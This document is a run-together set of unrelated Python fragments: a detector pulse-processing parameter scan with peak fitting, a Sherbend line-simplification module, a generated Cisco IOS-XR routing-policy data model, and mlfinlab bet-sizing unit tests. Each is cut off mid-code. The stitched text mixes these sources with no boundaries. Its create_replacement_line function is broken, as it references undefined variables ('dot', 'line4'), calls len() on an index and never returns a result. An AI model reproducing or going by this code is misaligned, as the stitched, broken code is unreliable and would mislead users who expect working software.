time in scan if i == 4: diff = time.time() - t_start tot = diff/5 * len(df_grid) / 60 tot -= diff / 60 print(f"Estimated remaining time: {tot:.2f} mins") rise, flat, rc = row print(f"Row {i}/{len(df_grid)}, rise {rise} flat {flat} rc {rc}") # custom tier 1 processor list -- very minimal proc_list = { "clk" : 100e6, "fit_bl" : {"ihi":500, "order":1}, "blsub" : {}, "trap" : [ {"wfout":"wf_etrap", "wfin":"wf_blsub", "rise":rise, "flat":flat, "decay":rc}, {"wfout":"wf_atrap", "wfin":"wf_blsub", "rise":0.04, "flat":0.1, "fall":2} # could vary these too ], "get_max" : [{"wfin":"wf_etrap"}, {"wfin":"wf_atrap"}], # "ftp" : {"test":1} "ftp" : {} } proc = Intercom(proc_list) dig = pgd.SIS3302Decoder dig.decoder_name = "df_windowed" dig.class_name = None out_dir = "/".join(f_tier2.split("/")[:-1]) # process silently ProcessTier1(f_tier1, proc, output_dir=out_dir, overwrite=True, verbose=False, multiprocess=True, nevt=np.inf, ioff=0, chunk=ds.config["chunksize"], run=ds.runs[0], t2_file=f_tier2, digitizers=[dig]) # load the temporary file and append to the main output file df_key = f"opt_{i}" t2df = pd.read_hdf(f_tier2) t2df.to_hdf(f_opt, df_key) def get_fwhm(f_grid, f_opt, verbose=False): """ duplicate the plot from Figure 2.7 of Kris Vorren's thesis (and much more!) this code fits the e_ftp peak to the HPGe peakshape function (same as in calibration.py) and writes a new column to df_grid, "fwhm". """ df_grid = pd.read_hdf(f_grid) # declare some new columns for df_grid cols = ["fwhm", "rchi2"] for col in cols: df_grid[col] = np.nan # loop over the keys and fit each e_ftp spectrum to the peakshape function print("i rise flat rc fwhm rchi2") for i, row in df_grid.iterrows(): key = f"opt_{i}" t2df = pd.read_hdf(f_opt, key=f"opt_{i}") # auto-histogram spectrum near the uncalibrated peak hE, xE, vE = ph.get_hist(t2df["e_ftp"], bins=1000, trim=False) # shift the histogram to be roughly centered at 0 and symmetric mu = xE[np.argmax(hE)] xE -= mu imax = np.argmax(hE) hmax = hE[imax] idx = np.where(hE > hmax/2) # fwhm ilo, ihi = idx[0][0], idx[0][-1] sig = (xE[ihi] - xE[ilo]) / 2.355 idx = np.where((xE > -8 * sig) & (xE < 8 * sig)) ilo, ihi = idx[0][0], idx[0][-1]-1 xE = xE[ilo-1:ihi] hE, vE = hE[ilo:ihi], vE[ilo:ihi] # plt.plot(xE[1:], hE, ls='steps', c='r', lw=3) # plt.show() # exit() # set initial guesses for the peakshape function. could all be improved mu = 0 sigma = 5 # radford uses an input linear function hstep = 0.001 htail = 0.5 tau = 10 bg0 = np.mean(hE[:20]) amp = np.sum(hE) x0 = [mu, sigma, hstep, htail, tau, bg0, amp] xF, xF_cov = pf.fit_hist(pf.radford_peak, hE, xE, var=vE, guess=x0) # goodness of fit chisq = [] for j, h in enumerate(hE): model = pf.radford_peak(xE[j], *xF) diff = (model - h)**2 / model chisq.append(abs(diff)) # update the master dataframe fwhm = xF[1] * 2.355 rchi2 = sum(np.array(chisq) / len(hE)) df_grid.at[i, "fwhm"] = fwhm df_grid.at[i, "rchi2"] = rchi2 rise, flat, rc = row[:3] label = f"{i} {rise:.2f} {flat:.2f} {rc:.0f} {fwhm:.2f} {rchi2:.2f}" print(label) if verbose: # plot every dang fit plt.cla() # peakshape function plt.plot(xE, pf.radford_peak(xE, *x0), c='orange', label='guess') plt.plot(xE, pf.radford_peak(xE, *xF), c='r', label='peakshape') plt.axvline(mu, c='g') # plot individual components # tail_hi, gaus, bg, step, tail_lo = pf.radford_peak(xE, *xF, components=True) # gaus = np.array(gaus) # step = np.array(step) # tail_lo = np.array(tail_lo) # plt.plot(xE, gaus * tail_hi, ls="--", lw=2, c='g', label="gaus+hi_tail") # plt.plot(xE, step
Parameters ---------- None Returns ------- float Length of the perimeter """ try: return self._perimeter except AttributeError: self._perimeter = self.polygon.length return self._perimeter @property def cmp_index(self): """Calculates the value of the compactness index Parameters ---------- None Returns ------- float Value of the compactness index """ try: return self._cmp_index except AttributeError: self._cmp_index = GenUtil.calculate_compactness_index(self.area, self.perimeter) return self._cmp_index @property def adj_area(self): """Calculates the value of the compactness index of the polygon Parameters ---------- None Returns ------- float Value of the compactness index """ try: return self._adj_area except AttributeError: self._adj_area = GenUtil.calculate_adjusted_area(self.area, self.cmp_index) return self._adj_area @property def replacement_line(self): """Calculates the replacement line of the bend Parameters ---------- None Returns ------- LineString Replacement line for the bend """ try: return self._replacement_line except AttributeError: self._replacement_line = LineString((self.bend_coords[0], self.bend_coords[-1])) return self._replacement_line def create_replacement_line (lst_coords, bend, diameter): """Calculate the replacement line for a bend""" # Extract the sub line containing the bend with one extra vertice on each side sub_line = LineStringSb(lst_coords[bend.i-1:bend.j+1]) bend_i = 1 bend_j = len(bend.j)-1 # Translate to sub line so that the bend starts at 0,0 xoff, yoff = lst_coords[bend.i][0], lst_coords[bend.i][1] line_translate = affinity.affine_transform(sub_line, [1, 0, 0, 1, -xoff, -yoff]) # Extract the angle between the base of the bend (bendi, bendj) and the x axis lst_coord = list(line_translate.coords) p0 = (lst_coord[bend_j][0], lst_coord[bend_j][1]) p1 = (lst_coord[bend_i][0], lst_coord[bend_i][1]) p2 = (abs(p0[0])+1., 0) angle = GenUtil.angle_vecor(p0, p1, p2) # p0_x = line1_coord[bend_j][0] # p0_y = line1_coord[bend_j][1] # p1_x = abs(p0_x) + 1. # In case x == 0 # p1_y = 0. # dot = p0_x * p1_x + p0_y * p1_y # len_a = (p0_x ** 2 + p0_y ** 2) ** .5 # len_b = (p1_x ** 2 + p1_y ** 2) ** .5 angle = math.acos(dot / (len_a * len_b)) angle = (angle * 180 / math.pi) if p0[1] >= 0.: angle = -angle # Clockwise rotation # if p0_y >= 0.: # angle = -angle # Rotate the bend so it's on the x axis a = math.cos(angle) b = -math.sin(angle) d = math.sin(angle) e = math.cos(angle) line_rotate = affinity.rotate(line_translate, angle, origin=(0, 0)) lst_coords = list(line_rotate.coords) # line_i = LineString(lst_coords[0:3]) # line_j = LineString(lst_coords[-2:]) # Calculate the angle between the base of the bend of segment before and after the bend theta_i = lib_geobato.GenUtil.compute_angle(lst_coords[0], lst_coords[1], lst_coords[bend_j]) theta_j = lib_geobato.GenUtil.compute_angle(lst_coords[bend_j], lst_coords[-2], lst_coords[-1]) # Determine if the bend_line = LineString(lst_coord[bend_i:bend_j+1]) (minx, miny, maxx, maxy) = bend_line.bounds y_dynamic = (abs(miny) + abs(maxy)) * 10. x_middle = (lst_coords[bend_i][0] + lst_coords[bend_j][0]) / 2. line_y_positive = LineString(((x_middle, 0), (x_middle, y_dynamic))) line_y_negative = LineString(((x_middle, 0), (x_middle, -y_dynamic))) if line4.crosses(line_y_positive): bend_side = +1 else: if line4.crosses(line_y_negative): bend_side = -1 if lst_coords[0][1] >= 0.: start_line_side = 1 else: start_line_side = -1 if lst_coords[-1][1] >= 0.: end_line_side = 1 else: end_line_side = -1 if (start_line_side * end_line_side == -1): print("Nothing to do....") line5 = LineString(lst_coords[0:bend_i + 1] + lst_coords[bend_j:]) else: # Both line are on the same side if start_line_side == 1 and end_line_side == 1: if bend_side == -1: angle_bias = 2. y_offset = -1 else: angle_bias = 3. y_offset = 1 if start_line_side == -1 and end_line_side == -1: if bend_side == 1: angle_bias = 2. y_offset = 1 else: angle_bias = 3. y_offset = 1 theta_i = (180. - theta_i) / angle_bias if theta_i >= 5.: hypothenus = x_middle / math.cos(theta_i * math.pi / 180.) y_height = math.sqrt(hypothenus ** 2 - x_middle ** 2) if bend_side == -1: y_height *= y_offset new_coord = (x_middle, y_height) line5 = LineString(lst_coords[0:bend_i + 1] + [new_coord] + lst_coords[bend_j:]) else: print("Nothing to do....") line5 = LineString(lst_coords[0:bend_i + 1] + lst_coords[bend_j:]) class AlgoSherbend(object): """Main class for the Sherbend algorithm Attributes: - None """ def __init__(self, command, geo_content): """Constructor of the class Parameters ---------- command : DataClass Contains all the commands for the Sherbend line simplification algorithm geo_content: DataClass Contains the geo information needed for the the sherbend line reduction algorithm Returns ------- None """ self.command = command self.geo_content = geo_content self.nbr_bend_simplified = 0 def calculate_min_adj_area(self, diameter): """Calculates the minimum adjusted area of a band Parameters ---------- diameter : float diameter used to calculate the minimum adjusted area Returns ------- float Minimum adjusted area """ return (_AREA_CMP_INDEX * math.pi * (diameter/2.0)**2.0) def _calculate_adj_area(self, coords): """Calculates the adjusted area of a polygon Parameters ---------- coords : list List of x,y coordinates defining a polygon Returns ------- float Minimum adjusted area """ pol = Polygon(coords) cmp_index = GenUtil.calculate_compactness_index(pol.area, pol.length) adj_area = GenUtil.calculate_adjusted_area(pol.area, cmp_index) return adj_area def load_features(self, geo_content, command): """Load the points, line strings and polygons in the spatial container. The Polygons are deconstructued into a list LineString with clockwise orientation and extra added information needed for the reconstruction of the original Polygon Parameters ---------- geo_content : DataClass Contains all the input#output geo spatial information command :ParserArgument Contains the parameters of the command line interface Returns ------- None """ features = [] # List of features to pass to the spatial container # Load all the features in the spatial container for feature in geo_content.in_features: diameter = command.dlayer_dict[feature.sb_layer_name] min_adj_area = self.calculate_min_adj_area(diameter) if feature.geom_type == GenUtil.POINT: out_feature = PointSb(feature.coords, feature.sb_layer_name, feature.sb_properties) # Add the feature features.append(out_feature) elif feature.geom_type == GenUtil.LINE_STRING: out_feature = out_feature = LineStringSb(feature.coords, GenUtil.LINE_STRING, min_adj_area, feature.sb_layer_name, feature.sb_properties) # Add the feature features.append(out_feature) elif feature.geom_type == GenUtil.POLYGON: adj_area = self._calculate_adj_area(feature.exterior.coords) # Only keep the polygon over the minimum adjusted area if not command.exclude_polygon or adj_area > min_adj_area: # Deconstruct the Polygon into a list of LineString with supplementary information # needed to reconstruct the original Polygon ext_feature = LineStringSb(feature.exterior.coords, GenUtil.POLYGON_EXTERIOR, min_adj_area, feature.sb_layer_name, feature.sb_properties) interiors = feature.interiors int_features = [] # Extract the interiors as LineString for interior in interiors: adj_area = self._calculate_adj_area(interior.coords) # Only keep the interior (hole) over the minimal adjusted area if not command.exclude_hole or adj_area > min_adj_area: interior = LineStringSb(interior.coords, GenUtil.POLYGON_INTERIOR, min_adj_area, None, None) int_features.append(interior) else: geo_content.nbr_del_holes += len(feature.interiors) # Add interior features needed for Polygon reconstruction ext_feature.sb_interiors = int_features # Add the exterior and the interior independently features.append(ext_feature) # Add the exterior features += int_features # Add the interiors else: # Do not add the feature (exterior and interiors ) in the spatial container # Update some stats geo_content.nbr_del_polygons += 1 geo_content.nbr_del_holes += len(feature.interiors) else: raise GeoSimException ("Invalid geometry type: {}".format(feature.geometry)) # Create the spatial container that will receive all the spatial features self.s_container = SpatialContainer() self.s_container.add_features(features) # Load all the features return def _manage_lines_simplification (self, s_constraints): """Main routine to simplify the lines For each line to simplify For each valid bend to simplify check the consraints if the constraint are violated check alternative bends (only if the number of bend to simplify is one. One of the costly operation specially for very long line string (like contour) is to rewrite the coordinates into the Shapely structure. This is why we updtade the shapely structure at the end when the last bend of the line is processed Parameters ---------- s_constraints : SpatialContraints Spatal constraints to validate Returns ------- int Total number of bend simplified """ iter_nbr = 0 total_nbr_bend_simplified = 0 # Iterate until all the line are simplified or there are no more line have to be simplified while (True): iter_nbr_bend_simplified = 0 print('Iteration # {}'.format(iter_nbr)) # Build line iterator lines = (feature for feature in self.s_container.get_features() if(not feature.sb_is_simplest and feature.sb_geom_type==GenUtil.LINE_STRING )) for line in lines: nbr_bend_simplified = line.simplify(self.command.diameter, s_constraints) iter_nbr_bend_simplified += nbr_bend_simplified total_nbr_bend_simplified += nbr_bend_simplified print('Number of bend simplified {}'.format(iter_nbr_bend_simplified)) print('----------') iter_nbr += 1 if iter_nbr_bend_simplified == 0: break print('Total number of bend simplified: {}'.format(total_nbr_bend_simplified)) print('Total number of simplicity error: {}'.format(s_constraints.nbr_err_simplicity)) print('Total number of crossing error: {}'.format(s_constraints.nbr_err_crossing)) print('Total number of sidedness error: {}'.format(s_constraints.nbr_err_sidedness)) return total_nbr_bend_simplified def process(self): """Main routine for the Sherbend algorithm The algorithm will simplify the lines using the Sherbend algorithm. It will iterate over the lines until there are no more bends to simplify. Parameters ---------- None Returns ------- geo_content
<filename>cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_policy_repository_oper.py """ Cisco_IOS_XR_policy_repository_oper This module contains a collection of YANG definitions for Cisco IOS\-XR policy\-repository package operational data. This module contains definitions for the following management objects\: routing\-policy\: Routing policy operational data Copyright (c) 2013\-2016 by Cisco Systems, Inc. All rights reserved. """ import re import collections from enum import Enum from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict from ydk.errors import YPYError, YPYModelError class AddressFamilyEnum(Enum): """ AddressFamilyEnum Address Family .. data:: ipv4 = 0 IPv4 Address Family .. data:: ipv6 = 1 IPv6 Address Family .. data:: l2vpn = 2 L2VPN Address Family .. data:: ls = 3 LINKSTATE Address Family .. data:: af_none = 4 No Address Family .. data:: af_unknown = 5 Unknown Address Family """ ipv4 = 0 ipv6 = 1 l2vpn = 2 ls = 3 af_none = 4 af_unknown = 5 @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta return meta._meta_table['AddressFamilyEnum'] class AttachPointDirectionEnum(Enum): """ AttachPointDirectionEnum Attach Point Direction .. data:: in_ = 0 Attach Point Direction IN .. data:: out = 1 Attach Point Direction OUT """ in_ = 0 out = 1 @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta return meta._meta_table['AttachPointDirectionEnum'] class GroupEnum(Enum): """ GroupEnum BGP Neighbor Group Type .. data:: address_family_group = 0 Address Family Group .. data:: session_group = 1 Session Group .. data:: neighbor_group = 2 Neighbor Group .. data:: neighbor = 3 Neighbor .. data:: error_group = 4 Error Group """ address_family_group = 0 session_group = 1 neighbor_group = 2 neighbor = 3 error_group = 4 @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta return meta._meta_table['GroupEnum'] class ObjectStatusEnum(Enum): """ ObjectStatusEnum Whether an RPL object is used/referenced .. data:: active = 0 The object is in use .. data:: inactive = 1 The object is referenced by another object, but not used .. data:: unused = 2 The object is not used or referenced """ active = 0 inactive = 1 unused = 2 @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta return meta._meta_table['ObjectStatusEnum'] class SubAddressFamilyEnum(Enum): """ SubAddressFamilyEnum Sub Address Family .. data:: unicast = 0 Unicast .. data:: multicast = 1 Multicast .. data:: label = 2 Label .. data:: tunnel = 3 Tunnel .. data:: vpn = 4 VPN .. data:: mdt = 5 MDT .. data:: vpls = 6 VPLS .. data:: rt_constraint = 7 RTConstraint .. data:: mvpn = 8 MVPN .. data:: flow = 9 FLOW .. data:: vpn_mcast = 10 VPN Multicast .. data:: saf_none = 11 No SAFI .. data:: saf_unknown = 12 Unknown """ unicast = 0 multicast = 1 label = 2 tunnel = 3 vpn = 4 mdt = 5 vpls = 6 rt_constraint = 7 mvpn = 8 flow = 9 vpn_mcast = 10 saf_none = 11 saf_unknown = 12 @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta return meta._meta_table['SubAddressFamilyEnum'] class RoutingPolicy(object): """ Routing policy operational data .. attribute:: limits Information about configured limits and the current values **type**\: :py:class:`Limits <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Limits>` .. attribute:: policies Information about configured route policies **type**\: :py:class:`Policies <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies>` .. attribute:: sets Information about configured sets **type**\: :py:class:`Sets <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Sets>` """ _prefix = 'policy-repository-oper' _revision = '2015-11-09' def __init__(self): self.limits = RoutingPolicy.Limits() self.limits.parent = self self.policies = RoutingPolicy.Policies() self.policies.parent = self self.sets = RoutingPolicy.Sets() self.sets.parent = self class Limits(object): """ Information about configured limits and the current values .. attribute:: compiled_policies_length The total compiled length of all policies **type**\: int **range:** 0..4294967295 .. attribute:: current_lines_of_policy_limit Number of lines of configuration for policies/sets currently allowed **type**\: int **range:** 0..4294967295 .. attribute:: current_lines_of_policy_used Current number of lines configured for all policies and sets **type**\: int **range:** 0..4294967295 .. attribute:: current_number_of_policies_limit Number of policies currently allowed **type**\: int **range:** 0..4294967295 .. attribute:: current_number_of_policies_used Current number of policies configured **type**\: int **range:** 0..4294967295 .. attribute:: maximum_lines_of_policy Maximum lines of configuration allowable for all policies and sets **type**\: int **range:** 0..4294967295 .. attribute:: maximum_number_of_policies Maximum number of policies allowable **type**\: int **range:** 0..4294967295 """ _prefix = 'policy-repository-oper' _revision = '2015-11-09' def __init__(self): self.parent = None self.compiled_policies_length = None self.current_lines_of_policy_limit = None self.current_lines_of_policy_used = None self.current_number_of_policies_limit = None self.current_number_of_policies_used = None self.maximum_lines_of_policy = None self.maximum_number_of_policies = None @property def _common_path(self): return '/Cisco-IOS-XR-policy-repository-oper:routing-policy/Cisco-IOS-XR-policy-repository-oper:limits' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return False def _has_data(self): if not self.is_config(): return False if self.compiled_policies_length is not None: return True if self.current_lines_of_policy_limit is not None: return True if self.current_lines_of_policy_used is not None: return True if self.current_number_of_policies_limit is not None: return True if self.current_number_of_policies_used is not None: return True if self.maximum_lines_of_policy is not None: return True if self.maximum_number_of_policies is not None: return True return False @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta return meta._meta_table['RoutingPolicy.Limits']['meta_info'] class Policies(object): """ Information about configured route policies .. attribute:: active All objects of a given type that are attached to a protocol **type**\: :py:class:`Active <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.Active>` .. attribute:: inactive All objects of a given type that are not attached to a protocol **type**\: :py:class:`Inactive <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.Inactive>` .. attribute:: route_policies Information about individual policies **type**\: :py:class:`RoutePolicies <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies>` .. attribute:: unused All objects of a given type that are not referenced at all **type**\: :py:class:`Unused <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.Unused>` """ _prefix = 'policy-repository-oper' _revision = '2015-11-09' def __init__(self): self.parent = None self.active = RoutingPolicy.Policies.Active() self.active.parent = self self.inactive = RoutingPolicy.Policies.Inactive() self.inactive.parent = self self.route_policies = RoutingPolicy.Policies.RoutePolicies() self.route_policies.parent = self self.unused = RoutingPolicy.Policies.Unused() self.unused.parent = self class RoutePolicies(object): """ Information about individual policies .. attribute:: route_policy Information about an individual policy **type**\: list of :py:class:`RoutePolicy <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies.RoutePolicy>` """ _prefix = 'policy-repository-oper' _revision = '2015-11-09' def __init__(self): self.parent = None self.route_policy = YList() self.route_policy.parent = self self.route_policy.name = 'route_policy' class RoutePolicy(object): """ Information about an individual policy .. attribute:: route_policy_name <key> Route policy name **type**\: str **pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+ .. attribute:: attached Information about where this policy or set is attached **type**\: :py:class:`Attached <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies.RoutePolicy.Attached>` .. attribute:: policy_uses Information about which policies and sets this policy uses **type**\: :py:class:`PolicyUses <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses>` .. attribute:: used_by Policies that use this object, directly or indirectly **type**\: :py:class:`UsedBy <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies.RoutePolicy.UsedBy>` """ _prefix = 'policy-repository-oper' _revision = '2015-11-09' def __init__(self): self.parent = None self.route_policy_name = None self.attached = RoutingPolicy.Policies.RoutePolicies.RoutePolicy.Attached() self.attached.parent = self self.policy_uses = RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses() self.policy_uses.parent = self self.used_by = RoutingPolicy.Policies.RoutePolicies.RoutePolicy.UsedBy() self.used_by.parent = self class PolicyUses(object): """ Information about which policies and sets this policy uses .. attribute:: all_used_policies Policies used by this policy, or by policies that it uses **type**\: :py:class:`AllUsedPolicies <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses.AllUsedPolicies>` .. attribute:: all_used_sets Sets used by this policy, or by policies that it uses **type**\: :py:class:`AllUsedSets <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses.AllUsedSets>` .. attribute:: directly_used_policies Policies that this policy uses directly **type**\: :py:class:`DirectlyUsedPolicies <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses.DirectlyUsedPolicies>` .. attribute:: directly_used_sets Sets that this policy uses directly **type**\: :py:class:`DirectlyUsedSets <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses.DirectlyUsedSets>` """ _prefix = 'policy-repository-oper' _revision = '2015-11-09' def __init__(self): self.parent = None self.all_used_policies = RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses.AllUsedPolicies() self.all_used_policies.parent = self self.all_used_sets = RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses.AllUsedSets() self.all_used_sets.parent = self self.directly_used_policies = RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses.DirectlyUsedPolicies() self.directly_used_policies.parent = self self.directly_used_sets = RoutingPolicy.Policies.RoutePolicies.RoutePolicy.PolicyUses.DirectlyUsedSets() self.directly_used_sets.parent = self class DirectlyUsedPolicies(object): """ Policies that this policy uses directly .. attribute:: object Policy objects **type**\: list of str """ _prefix = 'policy-repository-oper' _revision = '2015-11-09' def __init__(self): self.parent = None self.object = YLeafList() self.object.parent = self self.object.name = 'object' @property def _common_path(self): if self.parent is None: raise YPYModelError('parent is not set . Cannot derive path.') return self.parent._common_path +'/Cisco-IOS-XR-policy-repository-oper:directly-used-policies' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return False def _has_data(self): if not self.is_config(): return False if self.object is not None: for child in self.object: if child is not None: return True return False @staticmethod def _meta_info(): from
""" Tests the higher level functions in bet_sizing.py. """ import unittest from unittest.mock import patch import datetime as dt import numpy as np import pandas as pd from scipy.stats import norm, moment from mlfinlab.bet_sizing.bet_sizing import (bet_size_probability, bet_size_dynamic, bet_size_budget, bet_size_reserve, confirm_and_cast_to_df, get_concurrent_sides, cdf_mixture, single_bet_size_mixed) from mlfinlab.bet_sizing.ch10_snippets import (get_signal, avg_active_signals, discrete_signal, get_w, get_target_pos, limit_price, bet_size) from mlfinlab.bet_sizing.ef3m import M2N, raw_moment, most_likely_parameters class TestBetSizeProbability(unittest.TestCase): """ Tests the 'bet_size_probability' function. """ def test_bet_size_probability_default(self): """ Tests for successful execution using the default arguments of 'bet_size_probability', which are: average_active = False step_size = 0.0 """ # Setup the test DataFrame. dates_test = np.array([dt.datetime(2000, 1, 1) + i * dt.timedelta(days=1) for i in range(5)]) shift_dt = np.array([dt.timedelta(days=0.5*i+1) for i in range(5)]) dates_shifted_test = dates_test + shift_dt events_test = pd.DataFrame(data=[[0.55, 1], [0.7, -1], [0.95, 1], [0.65, -1], [0.85, 1]], columns=['prob', 'side'], index=dates_test) events_test['t1'] = dates_shifted_test # Calculate correct output. signal_0 = get_signal(events_test['prob'], 2, events_test['side']) df_signal_0 = signal_0.to_frame('signal').join(events_test['t1'], how='left') signal_1 = df_signal_0.signal # Evaluate test. self.assertTrue(signal_1.equals(bet_size_probability(events_test, events_test['prob'], 2, events_test['side']))) def test_bet_size_probability_avg_active(self): """ Tests for successful execution of 'bet_size_probability' with 'average_active' set to True. """ # Setup the test DataFrame. dates_test = np.array([dt.datetime(2000, 1, 1) + i * dt.timedelta(days=1) for i in range(5)]) shift_dt = np.array([dt.timedelta(days=0.5*i+1) for i in range(5)]) dates_shifted_test = dates_test + shift_dt events_test = pd.DataFrame(data=[[0.55, 1], [0.7, -1], [0.95, 1], [0.65, -1], [0.85, 1]], columns=['prob', 'side'], index=dates_test) events_test['t1'] = dates_shifted_test # Calculate correct output. signal_0 = get_signal(events_test['prob'], 2, events_test['side']) df_signal_0 = signal_0.to_frame('signal').join(events_test['t1'], how='left') signal_1 = avg_active_signals(df_signal_0, 1) # Evaluate test. self.assertTrue(signal_1.equals(bet_size_probability(events=events_test, prob=events_test['prob'], num_classes=2, pred=events_test['side'], average_active=True))) def test_bet_size_probability_stepsize(self): """ Tests for successful execution of 'bet_size_probability' with 'step_size' greater than 0. """ # Setup the test DataFrame. dates_test = np.array([dt.datetime(2000, 1, 1) + i * dt.timedelta(days=1) for i in range(5)]) shift_dt = np.array([dt.timedelta(days=0.5*i+1) for i in range(5)]) dates_shifted_test = dates_test + shift_dt events_test = pd.DataFrame(data=[[0.55, 1], [0.7, -1], [0.95, 1], [0.65, -1], [0.85, 1]], columns=['prob', 'side'], index=dates_test) events_test['t1'] = dates_shifted_test # Calculate correct output. signal_0 = get_signal(events_test['prob'], 2, events_test['side']) df_signal_0 = signal_0.to_frame('signal').join(events_test['t1'], how='left') signal_1 = df_signal_0.signal signal_1 = discrete_signal(signal0=signal_1, step_size=0.1) # Evaluate test. self.assertTrue(signal_1.equals(bet_size_probability(events=events_test, prob=events_test['prob'], num_classes=2, pred=events_test['side'], step_size=0.1))) class TestBetSizeDynamic(unittest.TestCase): """ Tests the 'bet_size_dynamic' function. """ def test_bet_size_dynamic_default(self): """ Tests for successful execution using the default arguments of 'bet_size_dynamic', which are: average_active = False step_size = 0.0 """ # Setup the test DataFrame. dates_test = np.array([dt.datetime(2000, 1, 1) + i * dt.timedelta(days=1) for i in range(5)]) events_test = pd.DataFrame(data=[[25, 55, 75.50, 80.00], [35, 55, 76.90, 75.00], [45, 55, 74.10, 72.50], [40, 55, 67.75, 65.00], [30, 55, 62.00, 70.80]], columns=['pos', 'max_pos', 'm_p', 'f'], index=dates_test) # Calculate results. d_events = {col: events_test[col] for col in list(events_test.columns)} events_results = confirm_and_cast_to_df(d_events) w_param = get_w(10, 0.95, 'sigmoid') events_results['t_pos'] = events_results.apply(lambda row: get_target_pos(w_param, row.f, row.m_p, row.max_pos, 'sigmoid'), axis=1) events_results['l_p'] = events_results.apply(lambda row: limit_price(row.t_pos, row.pos, row.f, w_param, row.max_pos, 'sigmoid'), axis=1) events_results['bet_size'] = events_results.apply(lambda row: bet_size(w_param, row.f-row.m_p, 'sigmoid'), axis=1) df_result = events_results[['bet_size', 't_pos', 'l_p']] # Evaluate. self.assertTrue(df_result.equals(bet_size_dynamic(events_test['pos'], events_test['max_pos'], events_test['m_p'], events_test['f']))) class TestBetSizeBudget(unittest.TestCase): """ Tests the 'bet_size_budget' function. """ def test_bet_size_budget_default(self): """ Tests for the successful execution of the 'bet_size_budget' function. """ # Setup the test DataFrame. dates_test = np.array([dt.datetime(2000, 1, 1) + i * dt.timedelta(days=1) for i in range(5)]) shift_dt = np.array([dt.timedelta(days=0.5*i+1) for i in range(5)]) dates_shifted_test = dates_test + shift_dt events_test = pd.DataFrame(data=[[0.55, 1], [0.7, 1], [0.95, 1], [0.65, -1], [0.85, 1]], columns=['prob', 'side'], index=dates_test) events_test['t1'] = dates_shifted_test # Calculate correct result. events_result = get_concurrent_sides(events_test['t1'], events_test['side']) avg_long = events_result['active_long'] / events_result['active_long'].max() avg_short = events_result['active_short'] / events_result['active_short'].max() events_result['bet_size'] = avg_long - avg_short # Evaluate. self.assertTrue(events_result.equals(bet_size_budget(events_test['t1'], events_test['side']))) class TestBetSizeReserve(unittest.TestCase): """ Tests the 'bet_size_reserve' function. """ @patch('mlfinlab.bet_sizing.bet_sizing.most_likely_parameters') def test_bet_size_reserve_default(self, mock_likely_parameters): """ Tests for successful execution of 'bet_size_reserve' using default arguments, return_parameters=False. Function 'most_likely_parameters' needs to be patched because the 'M2N.mp_fit' method makes use of random numbers. """ # Setup the test DataFrame. np.random.seed(0) sample_size = 500 start_date = dt.datetime(2000, 1, 1) date_step = dt.timedelta(days=1) dates = np.array([start_date + i*date_step for i in range(sample_size)]) shift_dt = np.array([dt.timedelta(days=d) for d in np.random.uniform(1., 20., sample_size)]) dates_shifted = dates + shift_dt time_1 = pd.Series(data=dates_shifted, index=dates) df_events = time_1.to_frame() df_events = df_events.rename(columns={0: 't1'}) df_events['p'] = np.random.uniform(0.0, 1.0, sample_size) df_events = df_events[['t1', 'p']] df_events['side'] = df_events['p'].apply(lambda x: 1 if x >= 0.5 else -1) # Calculate the correct results. events_active = get_concurrent_sides(df_events['t1'], df_events['side']) events_active['c_t'] = events_active['active_long'] - events_active['active_short'] central_moments = [moment(events_active['c_t'].to_numpy(), moment=i) for i in range(1, 6)] raw_moments = raw_moment(central_moments=central_moments, dist_mean=events_active['c_t'].mean()) m2n_test = M2N(raw_moments, epsilon=1e-5, factor=5, n_runs=25, variant=2, max_iter=10_000, num_workers=1) test_results = m2n_test.mp_fit() test_params = 